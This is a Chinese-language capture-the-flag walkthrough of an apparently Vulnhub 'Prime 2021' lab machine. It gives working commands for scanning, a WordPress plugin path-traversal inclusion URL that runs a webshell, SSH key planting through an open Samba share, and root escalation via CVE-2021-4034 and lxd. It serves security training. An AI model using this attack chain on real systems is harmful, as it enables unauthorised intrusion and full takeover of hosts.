kali：192.168.111.111

靶机：192.168.111.161

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.161

目录爆破发现wp目录，访问发现为wordpress

feroxbuster -k -d 1 --url http://192.168.111.161 -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap,conf -t 1 -C 404,500

enum4linux对目标samba服务进行枚举

enum4linux -a 192.168.111.161

访问welcome共享文件夹，猜测可能为jarves用户家目录，其中upload目录存在webshell

漏洞利用

wpscan扫描发现目标插件gracemedia-media-player存在文件包含

wpscan --url http://192.168.111.161/wp -e u,ap

包含在共享文件夹中发现的webshell

http://192.168.111.161/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id

获得反弹shell

另一种拿shell的方式是：通过samba创建.ssh文件夹之后上传公钥，再进行连接

ssh-keygen -f a
mv a.pub authorized_keys

smbclient -N \\\\192.168.111.161\\welcome
mkdir .ssh
cd .ssh
put authorized_keys

chmod 400 a
ssh jarves@192.168.111.161 -i a

提权

第一种提权方式：CVE-2021-4034提权https://github.com/berdav/CVE-2021-4034

cd CVE-2021-4034-main
make
./cve-2021-4034

第二种提权方式：jarves用户lxd提权

利用https://github.com/saghul/lxd-alpine-builder配合46978.sh脚本提权

./46978.sh -f alpine-v3.18-x86_64-20230526_1649.tar.gz

本栏目推荐文章
• 2021-2022 ICPC Northwestern European Regional Programming Contest (NWERC 2021)
• vulnhub-DC-6
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest
• 2021 Jiangsu Collegiate Programming Contest
• 【独立闯天下】Prim新传奇！原团队的Blazor版本迟迟无音，合并请求石沉大海。于是，我们决定单干！加入Prime Blazor版项目，一起开创崭新的旅程吧！
• 【THM】OWASP Top 10(2021版)-学习
• vulnhub靶场渗透学习
• P7830 [CCO2021] Through Another Maze Darkly
• P8386 [PA2021] Od deski do deski
• JOISC 2021 记录

靶机 Vulnhub Prime 2021靶机vulnhub prime 2021 靶机bluemoon vulnhub 2021 vulnhub-prime 靶机vulnhub dc 靶机hacksudo过程vulnhub 靶机metasploit过程vulnhub 靶机devrandom过程vulnhub 靶机healthcare过程vulnhub 靶机photographer过程vulnhub 靶机driftingblues vulnhub